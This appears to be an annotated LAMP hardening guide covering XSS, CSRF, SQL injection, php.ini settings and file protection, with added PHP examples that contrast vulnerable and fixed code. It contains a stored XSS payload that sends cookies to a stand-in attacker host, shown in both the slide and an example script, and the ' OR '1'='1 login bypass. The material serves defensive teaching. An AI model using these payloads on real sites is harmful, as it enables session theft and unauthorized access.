LAMP Security Practices
XSS
Request Forgeries
SQL Injection
Disable PHP, Apache, OS information
Disable unnecessary modules
Log PHP errors
Disable/Limit file uploads
DoS attack
Remote Code execution
Disable dangerous PHP functions
Limit access to file system
XSS
A hacker posts the code snippet below in the comment section of the website http://exsite.com:
Hello Everyone!<script>document.write("<img src='http://evilhacker.org/?" + document.cookie + "'>");</script>

Because the site stores the comment and writes it back into the page unescaped, the script is loaded as-is whenever I open the website http://exsite.com, and it transfers my cookie data to the hacker's site (http://evilhacker.org) as the query string of an image request.
Note that the cookie data may contain my login credentials, which you as a hacker can use to
XSS solution
All user-submitted content must be treated as untrusted. The slide's rule is to filter it on input and remove all disallowed characters, in particular < and >, and to strip all HTML tags (strip_tags()). Input filtering alone is fragile (it breaks legitimate text that contains < and does nothing for data that reached the database by another path), so in addition encode on output: pass every user-controlled value through htmlspecialchars($value, ENT_QUOTES, 'UTF-8') at the point where it is written into HTML, so the browser renders the payload as text instead of executing it.
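The stored-comment case from the XSS slide, as an added example that is not the slides' own code: the vulnerable rendering beside the encoded one, using the slide's payload as a constructed sample. It goes one step beyond the slide by also setting the session cookie HttpOnly, which limits what a script that does slip through can read via document.cookie.

```php
<?php
// Added example, not the slides' code: rendering a stored comment. The comment
// value is constructed here and equals the payload on the XSS slide; in the
// real site it would come from the comments table.
$comment = <<<'HTML'
Hello Everyone!<script>document.write("<img src='http://evilhacker.org/?" + document.cookie + "'>");</script>
HTML;

// Vulnerable: the stored text is written into the page as-is, so the browser
// parses the <script> element, runs it, and ships document.cookie to
// evilhacker.org in the image URL.
function render_comment_unsafe(string $comment): string
{
    return '<div class="comment">' . $comment . '</div>';
}

// Hardened: every HTML metacharacter (&, <, >, ", ') is encoded at output
// time, so the same bytes display as text and nothing executes. This is the
// fix to apply everywhere user data meets HTML, regardless of input filtering.
function render_comment_safe(string $comment): string
{
    return '<div class="comment">'
         . htmlspecialchars($comment, ENT_QUOTES | ENT_HTML5, 'UTF-8')
         . '</div>';
}

// Beyond the slide: mark the session cookie HttpOnly (and Secure on HTTPS) so
// that even a script that does run cannot read the session id through
// document.cookie. Must be set before session_start().
ini_set('session.cookie_httponly', '1');
ini_set('session.cookie_secure', '1');

echo render_comment_unsafe($comment), PHP_EOL; // executes in a browser
echo render_comment_safe($comment), PHP_EOL;   // displayed literally
```

Run it with php on the command line and compare the two lines: the first still contains a live <script> element, the second contains &lt;script&gt;, which no browser will execute.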
Request Forgeries
Create, update and delete requests should be verified to have originated from your own application; otherwise any page a logged-in user visits can trigger them with a hidden form or image tag (cross-site request forgery).
Ex. Don't use a bare URL like http://mysite.com/photos/delete/photo_id to delete a photo. Instead, embed a per-session signature in the link and accept it only for a predefined time. The slide's code, with its bugs fixed (the function is uniqid, not unique; PHP concatenates strings with ., not +; the second line lacked a semicolon):
$_SESSION['signature'] = md5(uniqid(rand(), true) . $username);
$_SESSION['signature_timestamp'] = time();
echo "<a href='http://mysite.com/photos/delete/photo_id?signature={$_SESSION['signature']}'>";

The delete handler must then compare the submitted signature with $_SESSION['signature'] and reject it once time() - $_SESSION['signature_timestamp'] exceeds the allowed window; the slide does not show that check. Note also that md5(uniqid(rand(), true)) is not a cryptographic random source: on PHP 7+ use bin2hex(random_bytes(32)), and put state-changing actions behind POST rather than a GET link.
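Both halves of the scheme the slide sketches, as an added example that is not the slides' code: issuing the signature (here called a CSRF token) with an expiry window, embedding it in a POST form, and verifying it in the delete handler. The names csrf_token, csrf_valid, delete_photo_form, the 10-minute window and the /photos/delete/<id> route are this example's own assumptions; it needs PHP 7.1+ for random_bytes and the nullable parameter type.

```php
<?php
// Added example, not the slides' code: a per-session CSRF token (the slide's
// "signature") with an expiry window, issued into a POST form and verified by
// the delete handler. Names and the 10-minute window are assumptions.

const CSRF_TTL_SECONDS = 600;

session_start();

// Issue one token per session; regenerate it when the window has elapsed.
function csrf_token(): string
{
    $expired = !isset($_SESSION['csrf_time'])
        || time() - $_SESSION['csrf_time'] > CSRF_TTL_SECONDS;
    if (!isset($_SESSION['csrf_token']) || $expired) {
        // CSPRNG, unlike the slide's md5(uniqid(rand())).
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
        $_SESSION['csrf_time']  = time();
    }
    return $_SESSION['csrf_token'];
}

// Accept a submitted token only if one was issued, it has not expired, and it
// matches byte for byte; hash_equals keeps the comparison constant-time.
function csrf_valid(?string $submitted): bool
{
    if ($submitted === null || !isset($_SESSION['csrf_token'], $_SESSION['csrf_time'])) {
        return false;
    }
    if (time() - $_SESSION['csrf_time'] > CSRF_TTL_SECONDS) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// The delete action is a POST form (a GET link must never change state), with
// the token carried in a hidden field. $photoId is assumed to be an integer id.
function delete_photo_form(int $photoId): string
{
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return "<form method=\"post\" action=\"/photos/delete/$photoId\">"
         . "<input type=\"hidden\" name=\"csrf_token\" value=\"$token\">"
         . "<button type=\"submit\">Delete</button></form>";
}

// Handler side: anything that is not a POST carrying a valid token is refused
// before the (hypothetical) delete_photo() would run.
if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST') {
    if (!csrf_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or expired request token');
    }
    // delete_photo($photoId);  // application code, not shown
}

echo delete_photo_form(42), PHP_EOL;
```

A forged request from another site cannot read the token out of the victim's session, so it fails the csrf_valid check; the expiry also bounds how long a token leaked through a log or referrer stays usable.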
SQL Injection
Ex. Input ' OR '1'='1 in the userid field of the login form. If the server script for authentication builds the query as "SELECT * FROM tblusers WHERE userid = '{$_GET['userid']}'", the input is interpolated to "SELECT * FROM tblusers WHERE userid = '' OR '1'='1'", whose WHERE clause is always true, so every row of tblusers is returned and the login check passes without valid credentials. The same technique can read, alter or delete any data the database account can reach.
SQL Injection Solution
Preferred: use prepared statements, so the query text is fixed and the user's value is sent separately and can never change the SQL:
$statement = $connection->prepare("SELECT * FROM tblusers WHERE userid = ?");
$statement->bind_param("s", $_GET['userid']);
$statement->execute();
(The slide binds with "i", integer; userid is compared as a string in the example above, so the type must be "s".)
Fallback, only where a query cannot be parameterised: escape every user-supplied value with mysqli_real_escape_string($connection, $_GET['userid']) (the connection is a required first argument) and always wrap the result in quotes in the SQL. Escaping does nothing for values used as identifiers or in LIMIT / ORDER BY, which must be validated against an allow-list.
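The login query from the two slides above, shown vulnerable and then parameterised, as an added example that is not the slides' code. It uses PDO against an in-memory SQLite table so it runs offline (the pdo_sqlite extension is assumed); against MySQL only the DSN changes. The table tblusers and the input ' OR '1'='1 are the slides'; the password_hash column and the login() function are this example's own additions.

```php
<?php
// Added example, not the slides' code: the login query vulnerable and fixed.
// Constructed data: one user in an in-memory SQLite table. Against MySQL use
// new PDO('mysql:host=...;dbname=...', $user, $pass) and the same code.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE tblusers (userid TEXT, password_hash TEXT)');
$ins = $db->prepare('INSERT INTO tblusers VALUES (?, ?)');
$ins->execute(['alice', password_hash('s3cret', PASSWORD_DEFAULT)]);

// Vulnerable: $userid is interpolated into the SQL string. With the slide's
// input  ' OR '1'='1  the WHERE clause becomes  userid = '' OR '1'='1'.
function find_user_unsafe(PDO $db, string $userid): array
{
    $sql = "SELECT userid FROM tblusers WHERE userid = '$userid'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Safe: the query text is fixed and the value travels as a bound parameter,
// so quotes in the input are data, never SQL.
function find_user_safe(PDO $db, string $userid): array
{
    $stmt = $db->prepare('SELECT userid FROM tblusers WHERE userid = ?');
    $stmt->execute([$userid]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Do not authenticate by matching the password inside the SQL at all: fetch
// the hash for the bound userid and verify it in PHP.
function login(PDO $db, string $userid, string $password): bool
{
    $stmt = $db->prepare('SELECT password_hash FROM tblusers WHERE userid = ?');
    $stmt->execute([$userid]);
    $hash = $stmt->fetchColumn();
    return $hash !== false && password_verify($password, $hash);
}

$attack = "' OR '1'='1";                    // the slide's input, constructed here
var_dump(find_user_unsafe($db, $attack));   // array with "alice": every row matched
var_dump(find_user_safe($db, $attack));     // empty array: no such userid
var_dump(login($db, 'alice', 's3cret'));    // true
var_dump(login($db, $attack, 'anything'));  // false
```

The first var_dump is the bypass the slide describes; the second shows the same bytes bound as a parameter matching nothing. login() also fixes the weaker pattern of comparing passwords in SQL, which an injected OR would defeat in the same way.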
Disable PHP information
Run the command:
curl -I http://mysite.com/
HTTP/1.1 200 OK
Date: Sat, 28 Apr 2012 09:48:55 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6

The output shows that the site runs on PHP, and the exact PHP version, which lets an attacker pick exploits for known bugs in that release.
Disable the header by setting expose_php = Off in php.ini (it cannot be changed per directory or with ini_set()), restart Apache, and repeat the curl -I check to confirm the X-Powered-By line is gone.
Disable Server Information
Run the command:
curl -I http://mysite.com/
HTTP/1.1 200 OK
Date: Sat, 28 Apr 2012 09:48:55 GMT
Server: Apache/2.2.20 (Ubuntu)

The output shows the Apache server, its version, and the OS (Ubuntu).
Reduce this to a bare "Server: Apache" by setting
ServerSignature Off
ServerTokens Prod
in /etc/apache2/conf.d/security on Ubuntu (/etc/apache2/conf-available/security.conf with Apache 2.4) or in httpd.conf, then reload Apache. ServerSignature Off also removes the version footer from Apache's own error pages and directory listings. This is hygiene only: the version can still be fingerprinted from behaviour, so patching matters more than hiding.
Disable unnecessary modules
Use php -m to list the enabled modules (this reflects the CLI's php.ini; for what Apache actually loads, check phpinfo() through the web server).
Disable modules like gd if they are not required; every loaded extension is additional attack surface.
On Ubuntu, go to the folder /etc/php5/conf.d and run:
sudo mv gd.{ini,disable}
This renames gd.ini to gd.disable, so the gd module is no longer loaded with PHP. Later Ubuntu releases provide php5dismod gd (php7: phpdismod gd) for the same purpose. Restart Apache and re-check the module list afterwards.
Log PHP errors
Use the following to stop PHP error messages (which leak file paths, query text and library versions) from being displayed to site users:
display_errors = Off

Use the following to log the PHP error messages into a log file instead:
log_errors = On
error_log = /var/log/httpd/php-error.log

The path is the RHEL/CentOS convention; on Ubuntu use /var/log/apache2/php-error.log. The file must be writable by the web server user (www-data or apache), otherwise errors are silently lost.
For real-time monitoring of the PHP error log use:
tail -f /var/log/httpd/php-error.log
Disable File Uploads
If your site does not need file upload functionality, turn it off in php.ini:
file_uploads = Off

If your site does need it, allow only the minimum size required. The slide's directive names file_upload and upload_max_size do not exist in php.ini; the correct ones are:
file_uploads = On
upload_max_filesize = 1M
post_max_size must be at least as large as upload_max_filesize, or uploads fail before PHP sees them. A size limit does not make uploads safe by itself: store uploaded files outside the document root and never trust the client-supplied file name or MIME type.
DoS attack
To stop a single script from running indefinitely or consuming all memory and bringing down the server, use the following settings:
max_execution_time = 30
max_input_time = 30
memory_limit = 40M
These are per-request caps (0 or -1 means unlimited), so they bound the damage one request can do; they do not limit how many requests arrive at once, which is handled in Apache (MaxClients, Timeout) or in front of it.
Remote Code Execution
Remote URLs can be opened by PHP functions like fopen, file_get_contents, include and require.
When the file name comes from user input and is not filtered carefully (for example include($_GET['page'])), an attacker can point it at a script on a server they control, which PHP then downloads and executes (remote file inclusion); the same URL wrappers also let injected code leak data to remote hosts.
To restrict remote file opening:
allow_url_fopen = Off
allow_url_include = Off
allow_url_include already defaults to Off. Turning allow_url_fopen off also breaks legitimate remote fetches with file_get_contents(), so check that the application uses an explicit HTTP client (ext/curl) for those. Neither setting protects against local file inclusion, so an included path must still be validated against an allow-list.
Disable Dangerous PHP functions
Use the following directive to disable PHP functions that are very powerful, dangerous, and not normally required when PHP is running under a web server:
disable_functions = exec, passthru, shell_exec, system, proc_open, popen, curl_exec, curl_multi_exec, parse_ini_file, show_source
disable_functions can only be set in php.ini, not in .htaccess or with ini_set(), so a compromised script cannot re-enable them. Check the list against what the application actually calls first (curl_exec in particular is often needed), and remember that this does not close other code-execution paths such as eval() or writing a .php file into the document root.
Limit Access to File System
Use the following to restrict PHP's file access to parts of the file system:
open_basedir="/var/www/html/"

PHP will then refuse to open anything outside that tree, for example /etc or /tmp. The value is a colon-separated list of prefixes, not directory names, so keep the trailing slash (/var/www/html without it would also allow /var/www/html-old) and add every directory PHP legitimately needs, such as the session directory. open_basedir applies to PHP's own file functions only; it does not constrain programs spawned via exec(), which is why it belongs together with disable_functions.
Session file path
Session files (which hold logged-in users' state) and upload temporaries must be saved away from the web site folder, so they can never be served or overwritten through the web root. Use the following to change their location:
session.save_path="/var/lib/php/session"
upload_tmp_dir="/var/lib/php/upload"
Both directories must exist, be writable by the web server user, and not be readable by other local users. If open_basedir is set, session.save_path must be inside it, otherwise session_start() fails with an open_basedir warning.
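The php.ini recommendations from the slides above (PHP information, error logging, file uploads, the DoS limits, remote URLs, dangerous functions, open_basedir and the session and upload paths) are easy to set and easy to lose on the next package upgrade, so here is an added check script, not the slides' code, that reads the running configuration with ini_get() and reports each directive against the slides' target. The document root /var/www/html and the 1M / 30 s / 40M caps are the slides' example values, assumed here as the targets; function names are this example's own.

```php
<?php
// Added example, not the slides' code: audit the running PHP configuration
// against the hardening directives from the slides. Run it through the web
// SAPI, or as   php -c /etc/php5/apache2/php.ini audit.php   because the CLI
// reads its own php.ini and would report that configuration, not Apache's.
// DOC_ROOT and the 1M/30s/40M caps are the slides' example values (assumed).

const DOC_ROOT = '/var/www/html';

// ini_get() reports a boolean directive as "" or "0" when Off and "1" (or the
// literal "On") when On, so normalise it before comparing.
function ini_bool(string $name): bool
{
    return filter_var((string) ini_get($name), FILTER_VALIDATE_BOOLEAN);
}

// Convert php.ini shorthand ("40M", "1M", "512K") into bytes; "-1" stays -1.
function ini_bytes(string $value): int
{
    $value = trim($value);
    $num   = (int) $value;
    switch (strtoupper(substr($value, -1))) {
        case 'G': return $num * 1024 ** 3;
        case 'M': return $num * 1024 ** 2;
        case 'K': return $num * 1024;
        default:  return $num;
    }
}

// True when $path lies under directory $dir (prefix test on normalised paths).
function path_under(string $path, string $dir): bool
{
    return $path !== '' && strpos(rtrim($path, '/') . '/', rtrim($dir, '/') . '/') === 0;
}

// One result line per directive: name, OK/FAIL, actual value, wanted value.
function audit(): array
{
    $out = [];
    $row = function (string $name, bool $ok, string $actual, string $want) use (&$out) {
        $out[] = sprintf('%-36s %-4s actual=%s want=%s', $name, $ok ? 'OK' : 'FAIL', $actual, $want);
    };

    foreach (['expose_php', 'display_errors', 'allow_url_fopen', 'allow_url_include'] as $d) {
        $row($d, !ini_bool($d), (string) ini_get($d), 'Off');
    }
    $row('log_errors', ini_bool('log_errors'), (string) ini_get('log_errors'), 'On');
    $row('error_log', (string) ini_get('error_log') !== '', (string) ini_get('error_log'), 'a log file path');

    // Uploads: either disabled, or capped at the slides' 1M.
    $maxUp = ini_bytes((string) ini_get('upload_max_filesize'));
    $row('file_uploads / upload_max_filesize', !ini_bool('file_uploads') || $maxUp <= ini_bytes('1M'),
         ini_get('file_uploads') . ' / ' . ini_get('upload_max_filesize'), 'Off, or On with <= 1M');

    // Per-request limits: 0 / -1 mean unlimited, so demand a positive value within the cap.
    foreach (['max_execution_time' => 30, 'max_input_time' => 30] as $d => $cap) {
        $v = (int) ini_get($d);
        $row($d, $v > 0 && $v <= $cap, (string) $v, "1..$cap");
    }
    $mem = ini_bytes((string) ini_get('memory_limit'));
    $row('memory_limit', $mem > 0 && $mem <= ini_bytes('40M'), (string) ini_get('memory_limit'), '<= 40M');

    // Each dangerous function must be listed in disable_functions.
    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    foreach (['exec', 'passthru', 'shell_exec', 'system', 'proc_open', 'popen'] as $fn) {
        $listed = in_array($fn, $disabled, true);
        $row("disable_functions: $fn", $listed, $listed ? 'listed' : 'missing', 'listed');
    }

    // open_basedir is a PATH_SEPARATOR-separated list of prefixes. Session files
    // must be inside it (session_start() fails otherwise) but, like upload
    // temporaries, outside the document root.
    $bases = array_filter(array_map('trim', explode(PATH_SEPARATOR, (string) ini_get('open_basedir'))));
    $row('open_basedir', $bases !== [], implode(PATH_SEPARATOR, $bases), 'set');
    $sess   = (string) ini_get('session.save_path');
    $inBase = $bases === [];   // no open_basedir means no restriction to satisfy
    foreach ($bases as $b) {
        $inBase = $inBase || path_under($sess, $b);
    }
    $row('session.save_path', $sess !== '' && $inBase && !path_under($sess, DOC_ROOT),
         $sess, 'set, inside open_basedir, outside ' . DOC_ROOT);
    $tmp = (string) ini_get('upload_tmp_dir');
    $row('upload_tmp_dir', $tmp !== '' && !path_under($tmp, DOC_ROOT), $tmp, 'set, outside ' . DOC_ROOT);

    return $out;
}

echo implode(PHP_EOL, audit()), PHP_EOL;
```

Any FAIL line names the directive to fix and the value PHP is actually using. If you run it through Apache to see the web SAPI's configuration, remove the script afterwards: its output describes exactly the settings an attacker would want to know.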
Write protect conf and application files
Use the chattr +i command to make a file immutable:
chattr +i /etc/php5/php.ini
chattr +i /etc/mysql/my.cnf
chattr +i /etc/apache2/apache2.conf
chattr -R +i /var/www/html/

(On Ubuntu the Apache SAPI reads /etc/php5/apache2/php.ini and the CLI /etc/php5/cli/php.ini; protect the one that is actually in use.)
Such files then cannot be modified, renamed or deleted, even by the root user, until the attribute is cleared. +i on a directory without -R only freezes the directory's own entries; the files inside stay writable, hence the recursive form for the web root, which is only practical for a site that never writes into its own tree. Use chattr -i to revert the write protection. Anyone with CAP_LINUX_IMMUTABLE (root) can clear the attribute, so this guards against mistakes and against a compromised web server user dropping a web shell, not against an attacker who already has root; it also means package upgrades and deployments fail until chattr -i is run.